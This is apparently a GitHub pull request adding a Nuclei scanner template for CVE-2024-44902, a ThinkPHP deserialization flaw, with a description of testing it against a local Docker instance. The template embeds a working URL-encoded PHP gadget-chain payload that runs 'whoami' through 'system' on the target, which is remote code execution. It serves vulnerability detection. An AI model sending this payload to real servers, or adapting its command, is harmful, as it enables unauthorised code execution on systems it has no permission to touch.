### PR TITLE
New Template: CVE-2024-44902 (ThinkPHP Insecure Deserialization)

### DIFF
--- a/http/cves/2024/CVE-2024-44902.yaml
+++ b/http/cves/2024/CVE-2024-44902.yaml
@@ -1,0 +1,22 @@
+id: CVE-2024-44902
+
+info:
+  name: ThinkPHP Insecure Deserialization (CVE-2024-44902)
+  author: RitikPrajapati
+  severity: critical
+  description: Detects insecure deserialization in ThinkPHP v6.1.3 to v8.0.4.
+  reference:
+    - https://github.com/fru1ts/CVE-2024-44902
+  tags: cve,cve2024,thinkphp,rce,deserialization
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/?x=O%3A28%3A%22think%5Croute%5CResourceRegister%22%3A2%3A%7Bs%3A13%3A%22%00%2A%00registered%22%3Bb%3A0%3Bs%3A11%3A%22%00%2A%00resource%22%3BO%3A15%3A%22think%5CDbManager%22%3A2%3A%7Bs%3A11%3A%22%00%2A%00instance%22%3Ba%3A0%3A%7B%7Ds%3A9%3A%22%00%2A%00config%22%3Ba%3A2%3A%7Bs%3A11%3A%22connections%22%3Ba%3A1%3A%7Bs%3A7%3A%22getRule%22%3Ba%3A2%3A%7Bs%3A4%3A%22type%22%3Bs%3A29%3A%22%5Cthink%5Ccache%5Cdriver%5CMemcached%22%3Bs%3A8%3A%22username%22%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A4%3A%7Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A6%3A%22fru1ts%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3B%7D%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A6%3A%22fru1ts%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A7%3A%22%00%2A%00json%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22fru1ts%22%3B%7Ds%3A12%3A%22%00%2A%00jsonAssoc%22%3Bb%3A1%3B%7D%7D%7Ds%3A7%3A%22default%22%3Bs%3A7%3A%22getRule%22%3B%7D%7D%7D"
+
+    matchers-condition: or
+    matchers:
+      - type: regex
+        regex:
+          - "(root|www-data|daemon|nobody|apache|nginx)"
+        part: body


### PR DESCRIPTION
**Description**
![SS](https://github.com/user-attachments/assets/c28c3c1c-c45d-465a-85fc-e9a6ce049571)

Added a new Nuclei template for CVE-2024-44902 (ThinkPHP Insecure Deserialization).

**Proof of Concept (POC)**
I verified this using a local Docker environment running ThinkPHP 8.0.0.
- **Vulnerable Environment:** Created using Docker (forced `topthink/framework:8.0.0`).
- **Exploit:** The template successfully triggers RCE and detects the `root` or `www-data` user in the response.

![SS](https://github.com/user-attachments/assets/f398ade1-7f50-445d-b3e2-85328980bbb9)
